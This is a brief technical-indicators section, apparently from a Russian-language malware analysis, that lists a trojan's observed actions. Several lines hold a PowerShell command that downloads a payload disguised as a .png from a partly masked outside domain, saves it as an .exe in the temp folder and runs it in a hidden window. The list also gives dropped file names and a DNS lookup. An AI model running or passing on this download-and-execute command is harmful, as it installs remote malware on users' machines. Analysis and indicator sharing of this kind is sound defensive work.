Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/king/wheatstag.png','%TEMP%\wheatstag.exe');%TEMP%\wheatstag.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\hc2.exe
- %TEMP%\wheatstag.exe
- http://www.az##p.xyz/king/wheatstag.png
- DNS ASK az##p.xyz
- '%TEMP%\wheatstag.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/king/wheatstag.png','%TEMP%\wheatstag.exe');%TEMP%\wheatstag.exe' (со скрытым окном)